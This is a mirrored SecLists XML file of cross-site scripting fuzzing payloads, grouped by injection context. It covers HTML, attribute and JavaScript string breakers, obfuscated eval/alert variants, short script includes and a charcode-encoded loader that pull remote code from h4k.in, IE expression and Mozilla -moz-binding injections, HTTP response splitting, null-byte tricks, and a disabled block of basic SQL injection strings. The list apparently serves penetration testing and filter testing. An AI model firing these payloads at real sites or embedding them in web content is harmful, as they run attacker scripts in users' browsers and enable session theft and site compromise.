Backup_Repos/SecLists
1
0
Fork 0
mirror of https://github.com/danielmiessler/SecLists synced 2026-03-30 10:03:01 +02:00
Code Issues Projects Releases Wiki Activity
SecLists/Fuzzing/XSS/human-friendly/XSS-EnDe-mario.xml
Mo Langning d0b72e7e31 duplicated files
2024-02-14 12:24:12 +00:00

534 lines
19 KiB
XML
Raw Blame History

<?xml version="1.0"?>
<!-- from: http://mario.heideri.ch/xss.xml
date: 03-jan-08
minor formal modifications
-->
<xss>
<attack>
<name> --- Reflective XSS Attacks ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>Advanced XSS Locator</name>
<code>&apos;;alert(0)//\&apos;;alert(1)//&quot;;alert(2)//\&quot;;alert(3)//--&gt;&lt;/SCRIPT&gt;&quot;&gt;&apos;&gt;&lt;SCRIPT&gt;alert(4)&lt;/SCRIPT&gt;=&amp;{}&quot;);}alert(6);function xss(){//</code>
<desc>This is a modified version of the XSS Locator from ha.ckers.org</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Advanced XSS Locator for &amp;lt;title&amp;gt;-Injections</name>
<code>&apos;;alert(0)//\&apos;;alert(1)//&quot;;alert(2)//\&quot;;alert(3)//--&gt;&lt;/SCRIPT&gt;&quot;&gt;&apos;&gt;&lt;/title&gt;&lt;SCRIPT&gt;alert(4)&lt;/SCRIPT&gt;=&amp;{&lt;/title&gt;&lt;script&gt;alert(5)&lt;/script&gt;}&quot;);}</code>
<desc>This is a modified version of the XSS Locator from ha.ckers.org</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>HTML Breaking XSS 1 (all quotes)</name>
<code>&apos;&apos;;!--&quot;&lt;script&gt;alert(0);&lt;/script&gt;=&amp;{(alert(1))}</code>
<desc>HTML Breaker - tries to break the attribute injected in</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>HTML Breaking XSS 2 (double quotes)</name>
<code>&quot;&gt;&lt;script&gt;alert(0);&lt;/script&gt;</code>
<desc>HTML Breaker - tries to break the attribute injected in</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>HTML Breaking XSS 3 (single quotes)</name>
<code>&apos;&gt;&lt;script&gt;alert(0);&lt;/script&gt;</code>
<desc>HTML Breaker - tries to break the attribute injected in</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>HTML Breaking XSS 4 (attributes)</name>
<code>&apos;&lt;script&gt;alert(0);&lt;/script&gt;</code>
<desc>HTML Breaker - credits go to Alex</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Semicolon XSS (HTML)</name>
<code>&lt;img src=x onerror=;;alert(1) /&gt;</code>
<desc>HTML Breaker - credits go to Kishor</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Title-breaker</name>
<code>&lt;/title&gt;&lt;script&gt;alert(1)&lt;/script&gt;</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>HTML-breaking XSS for backticked attributes</name>
<code>`&gt; &lt;script&gt;alert(5)&lt;/script&gt;</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Textarea-breaker (onmouseover)</name>
<code>&lt;/textarea&gt;&lt;br&gt;&lt;code onmouseover=a=eval;b=alert;a(b(/g/.source));&gt;MOVE MOUSE OVER THIS AREA&lt;/code&gt;</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Noscrript-breaker (onmouseover)</name>
<code>&lt;/noscript&gt;&lt;br&gt;&lt;code onmouseover=a=eval;b=alert;a(b(/h/.source));&gt;MOVE MOUSE OVER THIS AREA&lt;/code&gt;</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Style-breaker</name>
<code>}&lt;/style&gt;&lt;script&gt;a=eval;b=alert;a(b(/i/.source));&lt;/script&gt;</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name> --- Reflective JS XSS ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>JS Breaking XSS 1</name>
<code>;}alert(0);{</code>
<desc>JS Breaker - tries to break the javascript injected in</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>JS Breaking XSS 2 (string concatination)</name>
<code>&quot;+alert(0)+&quot;</code>
<desc>JS Breaker - tries to break the javascript injected in</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>onerror XSS Injection</name>
<code>xyz onerror=alert(6); </code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>onclick XSS Injection</name>
<code>onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source);</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Plain JS XSS Injection 1</name>
<code>a=eval;b=alert;a(b(8));</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Plain JS XSS Injection 2</name>
<code>a=1;a=eval;b=alert;a(b(11));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>String-breaking JS Injection (single qouted)</name>
<code>&apos;;//%0da=eval;b=alert;a(b(9));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>String-breaking JS Injection (double qouted)</name>
<code>&quot;;//%0da=eval;b=alert;a(b(10));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>String-breaking JS Injection (single qouted)</name>
<code>&apos;};a=eval;b=alert;a(b(13));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>JSON-breaking JS Injection (double qouted)</name>
<code>&quot;};a=eval;b=alert;a(b(12));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>JSON-breaking JS Injection (non-qouted)</name>
<code>1};a=eval;b=alert;a(b(14));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Array-breaking JS Injection (sinlge qouted)</name>
<code>&apos;];a=eval;b=alert;a(b(15));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Array-breaking JS Injection (double qouted)</name>
<code>&quot;];a=eval;b=alert;a(b(16));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Array-breaking JS Injection (non qouted)</name>
<code>1];a=eval;b=alert;a(b(17));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Int-breaking JS Injection (non qouted)</name>
<code>1;a=eval;b=alert;a(b(/c/.source));</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>CRLF-forced JS Injection</name>
<code>%0da=eval;b=alert;a(b(/d/.source));</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>JS Comment breaker</name>
<code>*/a=eval;b=alert;a(b(/e/.source));/*</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name> --- JS Includes ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>Tiny XSS Include 1 (20 characters, FFox only)</name>
<code>&lt;script src=//h4k.in</code>
<desc>Super-tiny inclusion vector - 20 characters length.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Tiny XSS Include 2 (27 characters - all browsers)</name>
<code>&lt;script src=http://h4k.in/&gt;</code>
<desc>Super-tiny inclusion vector for IE, FFox and Opera - 27 characters length. Credits go to kogir.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Tiny XSS Include 3 (30 characters - all browsers)</name>
<code>&lt;script src=//h4k.in&gt;&lt;/script&gt;</code>
<desc>Tiny inclusion vector for IE, FFox and Opera - 30 characters length.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Tiny XSS Include 4 (HTML Breaking)</name>
<code>&quot;&gt;&lt;script src=//h4k.in&gt;&lt;/script&gt;&lt;</code>
<desc>Tiny inclusion vector for IE, FFox and Opera - breaks HTML.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name> --- Fragmented DOM XSS ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>Include Fragment Pt. 1</name>
<code>&lt;scri</code>
<desc>First part of a fragmented inclusion attack vector. Swallows the enclosed HTML.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Include Fragment Pt. 2</name>
<code>pt src=//h4k.in&gt;&lt;</code>
<desc>Second part of a fragmented inclusion attack vector.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Include Fragment Pt. 3</name>
<code>&gt;&lt;/script&gt;</code>
<desc>Third part of a fragmented inclusion attack vector.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name> --- HTML Injection ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>Advanced HTML Injection Locator</name>
<code>&lt;s&gt;000&lt;s&gt;%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e&amp;#60&amp;#115&amp;#62&amp;#51&amp;#51&amp;#51&amp;#60&amp;#47&amp;#115&amp;#62&amp;#x3c&amp;#x73&amp;#x3e&amp;#x34&amp;#x34&amp;#x34&amp;#x3c&amp;#x2f&amp;#x73&amp;#x3e</code>
<desc>HTML injection vector.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>HTML Injection 1 (http://h4k.in/i.js)</name>
<code>&quot;&gt;&lt;script src=http://h4k.in/i.js&gt;&lt;/script&gt;</code>
<desc>HTML injection vector.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>HTML Injection 2 (using JS - http://h4k.in/i.js)</name>
<code>&quot;&gt;&lt;script&gt;a=document.createElement(&apos;script&apos;);a.src=&apos;http://h4k.in/i.js&apos;;document.body.appendChild(a);&lt;/script&gt;</code>
<desc>HTML injection vector.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>HTML Injection 3 (using charcode - http://h4k.in/i.js)</name>
<code>&quot;&gt;&lt;script&gt;eval(String.fromCharCode(97,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,97,46,115,114,99,61,39,104,116,116,112,58,47,47,104,52,107,46,105,110,47,105,46,106,115,39,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,97,41,59))&lt;/script&gt;</code>
<desc>HTML injection vector.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<!-- disabled 03-jan-08
<attack>
<name> ___ SQL Injections ___x</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>Basic SQL Injection 1</name>
<code> 1 OR 1 = 1 </code>
<desc>Very basic SQL Injection vector</desc>
<label>SQL Injection Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Basic SQL Injection 2</name>
<code>1' OR '1'='1</code>
<desc>Another basic SQL Injection vector</desc>
<label>SQL Injection Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Basic SQL Injection 3</name>
<code>1\'1</code>
<desc>Another basic SQL Injection vector</desc>
<label>SQL Injection Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Basic SQL Injection 4</name>
<code>') OR 1 &lt; 2 #</code>
<desc>Another basic SQL Injection vector</desc>
<label>SQL Injection Attacks</label>
<browser/>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
-->
<attack>
<name> --- Browser specific attacks ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>IE VBScript injection</name>
<code>vbscript:Execute(MsgBox(chr(88)&amp;chr(83)&amp;chr(83)))</code>
<desc>This works in IE only - use the PoC Link feature to test for this.</desc>
<label>Browser specific Attacks</label>
<browser>IE</browser>
</attack>
<attack>
<name>IE expression injection</name>
<code>&quot; style=&quot;color: expression(alert(0));&quot; a=&quot;</code>
<desc>This works in IE only - use the PoC Link feature to test for this.</desc>
<label>Browser specific Attacks</label>
<browser>IE</browser>
</attack>
<attack>
<name>IE closing-tag expression injection</name>
<code>&lt;/a style=&quot;&quot;xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')&quot;&gt;</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser>IE</browser>
</attack>
<attack>
<name>IE backticked semicolon injection</name>
<code>&lt;img src=`x` onrerror= ` ;; alert(1) ` /&gt;</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser>IE</browser>
</attack>
<attack>
<name>Mozilla -moz-binding-url injection</name>
<code>&quot; style=&quot;-moz-binding:url(http://h4k.in/mozxss.xml#xss);&quot; a=&quot;</code>
<desc>This works in Gecko browsers only.</desc>
<label>Browser specific Attacks</label>
<browser>Gecko</browser>
</attack>
<attack>
<name>Mozilla -moz-binding-url injection (filter evading)</name>
<code>&quot; sstyle=&quot;foobar&quot;tstyle=&quot;foobar&quot;ystyle=&quot;foobar&quot;lstyle=&quot;foobar&quot;estyle=&quot;foobar&quot;=-moz-binding:url(http://h4k.in/mozxss.xml#xss)&gt;foobar&lt;/b&gt;#xss)&quot; a=&quot;</code>
<desc>This works in Gecko browsers only. Was once used on php.net</desc>
<label>Browser specific Attacks</label>
<browser>Gecko</browser>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name> --- Weird stuff ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>HTTP Reponse Splitting XSS</name>
<code>%0aContent-Type:text/html%0a%0a%3cscript%3ealert(0)%3c/script%3ehttp://www.google.de/</code>
<desc>HTTP response splitting vector with XSS alert</desc>
<label>Weird stuff</label>
<browser></browser>
</attack>
<attack>
<name>Nullbyte XSS</name>
<code>c%00&quot;&quot;&lt;script&gt;alert(0);&lt;/script&gt;</code>
<desc></desc>
<label>Weird stuff</label>
<browser></browser>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name> --- Style injections and hw/fw-encoding attacks ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>BODY{-moz-binding:url(&quot;http://h4k.in/mozxss.xml%23xss&quot;)}</name>
<code>BODY{-moz-binding:url(&quot;http://h4k.in/mozxss.xml%23xss&quot;)}</code>
<desc></desc>
<label>hw/fw injections</label>
<browser/>
</attack>
<attack>
<name>x=alert;x(%26%2340 /finally through!/.source %26%2341);</name>
<code>x=alert;x(%26%2340 /finally through!/.source %26%2341);</code>
<desc></desc>
<label>hw/fw injections</label>
<browser/>
</attack>
<attack>
<name>%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);//</name>
<code>%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);//</code>
<desc></desc>
<label>hw/fw injections</label>
<browser/>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name> --- URL injection ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>http://aa&amp;lt;script&amp;gt;alert(123)&amp;lt;/script&amp;gt;</name>
<code>http://aa&lt;script&gt;alert(123)&lt;/script&gt;</code>
<desc></desc>
<label>URL injection</label>
<browser/>
</attack>
</xss>
Reference in a new issue View git blame Copy permalink